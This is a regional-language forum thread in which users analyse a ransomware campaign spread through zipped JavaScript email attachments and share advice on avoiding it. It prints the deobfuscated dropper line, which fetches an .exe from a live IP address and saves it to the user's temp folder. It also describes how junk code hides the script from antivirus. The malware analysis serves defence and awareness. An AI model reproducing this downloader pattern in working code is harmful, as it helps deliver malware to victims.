CryptoLocker

[TheLucas]

Nista ,pdf, to je ranije moglo. Sad ako pokrenes .js, java automatski skida .exe ili .scr sa nekog servera i otvara ga i tu si ugasen.

js pretpostavljam da je java script
kako se pokrece to? treba li da kliknes nesto ili otvoris ili moze samo od sebe npr ako otvoris neki sajt pa da se automatski pokrece
bas sam ti dibidus za ovo
sto je scr

[LINK systems]

js pretpostavljam da je java script
kako se pokrece to? treba li da kliknes nesto ili otvoris ili moze samo od sebe npr ako otvoris neki sajt pa da se automatski pokrece
bas sam ti dibidus za ovo
sto je scr

scr ti je screensaver fajl za Windows, ali se ponaša dosta slično kao exe (tj aplikaciji), i može da izvrši komande nad sistemom etc.

js (tj javascript) isto, dvoklik je dovoljno i kompjuter je inficiran.


svaki iole poznat antivirus bi trebalo da detektuje većinu ovih, mada nije na odmet malo uključiti mozak. Što god je exe, js, scr, bat, cmd, jar, js, vbs itd. ne otvarati... da budem precizniji, nijedan atačment koji ne znate šta je, od koga je ili koji je format (exe može lako da ima ikonicu Word dokumenta) ne otvarati. Pogotovo ako su spakovani u arhivu.

Što se tiče vulnerability exploita, ovo je teže izvesti u praksi (bar danas) jer dosta zavisi od softvera na korisničkom kompu i sl. mada ja isto nalazim dosta kompjutera po firmama sa bušnim Adobe Readerom 6 bez updejta. Usput, dosta je ograničeno šta se sa ovom metodom može odraditi. I dalje je zlatno pravilo, nepoznate atačmente na mail i na facebook ne otvarati i manje-više mirni.

[TheLucas]

Pa dobro to je neka osnovna logika kod koriscenja racunara, sto ne znas i ne prepoznajes, ne klikaj. Samo sto mnogi to ne postuju.

[^^0LIvEr_QuEeN^^]

ovo je mail koji stiže;

a ovdje vam je js skript koji sam pretvorio u txt fajl da ga neko greškom ne pokrene:

https://mega.nz/#!5glFnYzR!HFehRdkzZ...yHZlNiMZsl1T80

Na win10 nece ni ovaj txt file da otvori, win defender ga blokira, čudi me

Sent from my SM-N9005 using Tapatalk

[LINK servis]

Na win10 nece ni ovaj txt file da otvori, win defender ga blokira, čudi me

Sent from my SM-N9005 using Tapatalk

ekstenzija je .txt a ne .js ili neka sumnjiva (znači ne može da ti naškodi kompjuteru, ako na to ciljaš), a inače kad sam uploadovao fajl na Virus Total, poslednji scan (od juče) je pokazivao 3 detekcije, a sad ih ima daleko više...

[^^0LIvEr_QuEeN^^]

Ja ne ciljam, znam da je .txt pa zato i rekoh čudo da ga je defender blokirao, jer inače se ponaša kao da ga nema, svaki dan se susrijećem sa računarima koji su puni virusa a defender imaju, pa se iznenadih

Sent from my SM-N9005 using Tapatalk

[LINK servis]

Ja ne ciljam, znam da je .txt pa zato i rekoh čudo da ga je defender blokirao, jer inače se ponaša kao da ga nema, svaki dan se susrijećem sa računarima koji su puni virusa a defender imaju, pa se iznenadih

Sent from my SM-N9005 using Tapatalk

jbg ja nemam AV na pc
no ne znam smijem li ovo govorit ovako javno, jer mi je prošli put neki maloumni idiot opalio masu negative reputation poena zato što sam to postovao

mada pre dan-dva ga nije gotovo ništa detektovalo, mora da su ažurirali detekcije da fataju file pattern ili šta već.

[.:.]

U folderima koje je sredio, pored enkriptovanih fajlova je dodao sliku naziva: HELP_YOUR_FILES.PNG

[.:.]

....a kada se preko isprate instrukcije, dobije se ovo hahahhaha:




Bilo kako bilo, bitni podaci su vraceni iz backupa, a neke gluposti sa desktopa sto je uspio da enkriptuje....pa za njih i nije neka velika steta; tako da ce od ovog kompjutera dobiti samo .|.

A pazi im fore: DECRYPT 1 FILE FOR FREE.......e njihove duse nema na svijet

[remark]

Jutros su mi stigla dva kom, tačno su viđeli da sam ih pominja pa da me probaju , na @t-com.me lagano prolaze a gmail ih blokira.

Evo ih pošiljaoci današnjih zipovanih "faktura".

[email protected]

[email protected]

[Njivice_Orano_Nepreorano]

Samo da priupitam: Jesu li svi koji su fasovali virus koristili e-mail klijent sa nalogom na t-com.me ?

[Djoks]

Otprilike ovako izgleda demaskiran i uprošćen JavaScript kod:



Nijesam uspio da preuzmem ovaj EXE ...

[Djoks]

Koristan link za info: http://www.bleepingcomputer.com/viru...re-information

[Njivice_Orano_Nepreorano]

Nijesam uspio da preuzmem ovaj EXE ...

85.exe ili 98403.exe ?

Na UA se vodi IP adresa, ali lice na koga glasi je iz Sevastopolja (RU) - ima li veze ovo sa pozivom u NATO - buduci da se intenzivirao od pocetka decembra ovaj virus.

[Djoks]

85.exe ili 98403.exe ?

Na UA se vodi IP adresa, ali lice na koga glasi je iz Sevastopolja (RU) - ima li veze ovo sa pozivom u NATO - buduci da se intenzivirao od pocetka decembra ovaj virus.

85.exe se download-uje i snima kao 98403.exe (random name); No trenutno nije aktivan http protokol na navedenoj IP adresi ...

http://mxtoolbox.com/SuperToolX.aspx...7&run=toolpage

[napalm]

85.exe se download-uje i snima kao 98403.exe (random name); No trenutno nije aktivan http protokol na navedenoj IP adresi ...

http://mxtoolbox.com/SuperToolX.aspx...7&run=toolpage

Je si li siguran da se skida 85.exe ?? Sta je sa p nizom. Ovo p[f] + 1. Sta je sadrzaj p niza ?! Ako nije prazan onda skript skida fajl "/85.exe?????1"
Upitnici zavise od toga sta sadrzi p niz. Pristupa se gornjoj adresi vishe puta sve dok se ne preuzme fajl koji ima velicinu vecu od 1938 bajtova.
Uz pomoca for petlje i p niza malko je maskiran pravi URL do zlocudnog fajla,koji jeste PE (citaj exe fajl)

Iz gornjeg koda "98403.exe" uopste nije pseuodslucajno dobijeno ime. Sel je temp direktorijum u c:\users\%username%\... (odnosno c:\documents and settings\%username%\....) fascikli )

[Djoks]

JavaScript nije moja oblast, pa mi nemojte uzeti za zlo ukoliko sam što pogrešno naveo
Zato je tu kod pa se može viđeti što je, a evo neprečišćenog deobfuscate-ovanog originala:



p niz se, koliko vidim, dijeli po space-u pa je sadržaj niza interesantan jedino kod prvog člana niza ... Ima dosta "smeća", nepotrebnih varijabli isl. kako bi se kod učinio manje čitljivim ...

Pretpostavljam da je 98403.exe random ime (tako obično biva kod ovih infekcija) ... Ali nije ni bitno kako se fajl zove, dok god se u istoj metodi i pokreće ...

[LINK servis]

Otprilike ovako izgleda demaskiran i uprošćen JavaScript kod:



Nijesam uspio da preuzmem ovaj EXE ...

Hvala kolega, ja nisam nikako moga provalit šta su ubacili...
znači:

85.exe
98403.exe

... veselo xD

[Djoks]

Hvala kolega, ja nisam nikako moga provalit šta su ubacili...
znači:

85.exe
98403.exe

... veselo xD

Moja pretpostavka, ali eto može napalm da potvrdi.
Hvala sajtu: http://deobfuscatejavascript.com

Nažalost, Windows Defender (W10) je kod mene presreo ovaj kod tek nakon što je deobfuscate-ovan :/

[napalm]

Na kraju ispadne ovako kad se ocisti:

gz.open("GET","http://46.151.52.197/85.exe?1",false);

ZNACHI:

Pristupa se http://46.151.52.197/85.exe?1 i sadrzaj se snima kao C:\Users\%USERNAME%\AppData\Local\Temp\98403.exe (ovo je putanja temp dir korisnika na 7ci,na XP je slicno,za ostale >7 ne znam)

(IAKO ISTI NE RADE (U TRENUTKU KUCANJA OVOG TEKSTA), IPAK NEMOJTE KLIKAT NA GORNJE LINKOVE).

[Sandor Kolar]

Nepotrebni kod se ubaca kako bi fajl postao FUD.

[LINK servis]

Na kraju ispadne ovako kad se ocisti:

gz.open("GET","http://46.151.52.197/85.exe?1",false);

ZNACHI:

Pristupa se http://46.151.52.197/85.exe?1 i sadrzaj se snima kao C:\Users\%USERNAME%\AppData\Local\Temp\98403.exe (ovo je putanja temp dir korisnika na 7ci,na XP je slicno,za ostale >7 ne znam)

(IAKO ISTI NE RADE (U TRENUTKU KUCANJA OVOG TEKSTA), IPAK NEMOJTE KLIKAT NA GORNJE LINKOVE).

Izgleda se ne može pristupiti više ovoj adresi, ili su je isključili, ili je mijenjaju sa svakim atačmentom (ili periodom). ili su ih TLDovi blokirali... vjerovatno je ovo drugo, tj. da je mijenjaju od atačmenta do atačmenta (ili u vremenskim intervalima).

[LINK servis]

Moja pretpostavka, ali eto može napalm da potvrdi.
Hvala sajtu: http://deobfuscatejavascript.com

Nažalost, Windows Defender (W10) je kod mene presreo ovaj kod tek nakon što je deobfuscate-ovan :/

aha, to objašnjava zašto js nije detektovan od strane antivirusa, ali kad sam ja zakačio .txt verziju onda je detektovan.

[remark]

Ovi ne posustaju, 5 kom mi je stiglo danas, ima li neko trezven u t-com dUradi nešto povodom ovoga?

[Njivice_Orano_Nepreorano]

Ne moze t-com (cg) nista da uradi brzo, moraju da mjenjaju cijelu e-mail arhitekturu i av engine sa as enginem. Ozbiljne pare se ulazu u zastitu ozbiljnih e-mail sistema, dok kod t-coma mi se cini da je baziran na OS, kome nema ko da se posveti 24h. Kazem, cini mi se.

Ja sam samo pitao, da li ste prepoznali izvor zaraze kao mejl klijenti koji preuzimaju mejlove sa t-com e-mail naloga? Vidio sam neuobicajenu aktivnost u zadnjih 10 dana sa e-mailovima koji stizu na t-com me, pa zato pitam.